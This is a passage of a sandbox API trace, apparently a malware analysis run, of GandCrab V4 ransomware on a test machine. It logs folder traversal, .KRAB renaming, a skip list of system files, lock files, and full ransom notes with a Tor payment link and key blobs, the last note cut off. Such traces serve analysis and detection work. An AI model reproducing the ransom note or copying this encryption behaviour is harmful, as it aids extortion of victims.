lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.841] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a08d2ca4dee3d.lock") returned 96 [0062.841] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x45c [0062.841] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.841] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.842] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\") returned 73 [0062.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0062.842] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd620 [0062.842] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.842] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.842] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.842] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.842] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.842] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.842] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a08d2ca4dee3d.lock" [0062.842] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.842] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 101 [0062.843] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a08d2ca4dee3d.lock") returned 96 [0062.843] lstrlenW (lpString=".lock") returned 5 [0062.843] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.843] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.843] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.843] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.843] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.843] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.843] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.844] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\KRAB-DECRYPT.txt" [0062.844] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.844] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\KRAB-DECRYPT.txt.KRAB") returned 94 [0062.844] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\KRAB-DECRYPT.txt") returned 89 [0062.844] lstrlenW (lpString=".txt") returned 4 [0062.844] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.844] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.844] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\KRAB-DECRYPT.txt") returned 89 [0062.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\KRAB-DECRYPT.txt") returned 89 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.845] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.845] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.845] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.845] lstrcmpW (lpString1="Managed", lpString2=".") returned 1 [0062.845] lstrcmpW (lpString1="Managed", lpString2="..") returned 1 [0062.845] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="Managed" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0062.846] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\" [0062.846] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.846] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.846] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.847] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\\\KRAB-DECRYPT.txt") returned 98 [0062.847] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0062.881] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.881] WriteFile (in: hFile=0x40c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.882] CloseHandle (hObject=0x40c) returned 1 [0062.883] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.883] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.883] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0xa, wMilliseconds=0x56)) [0062.883] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.884] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.884] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.884] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a08d2ca4dee3d.lock") returned 104 [0062.884] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x40c [0062.903] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.903] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.904] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\") returned 81 [0062.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0062.904] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xfbe0a0 [0062.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.904] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0062.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.904] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0062.904] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.904] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a08d2ca4dee3d.lock" [0062.904] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.904] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 109 [0062.904] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a08d2ca4dee3d.lock") returned 104 [0062.905] lstrlenW (lpString=".lock") returned 5 [0062.905] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.905] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.905] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.905] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.905] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0062.905] lstrcmpW (lpString1="Document Themes", lpString2=".") returned 1 [0062.905] lstrcmpW (lpString1="Document Themes", lpString2="..") returned 1 [0062.906] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="Document Themes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0062.906] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\" [0062.906] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.906] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.906] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.906] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.906] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.906] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.906] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.907] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\\\KRAB-DECRYPT.txt") returned 114 [0062.907] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0062.916] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGv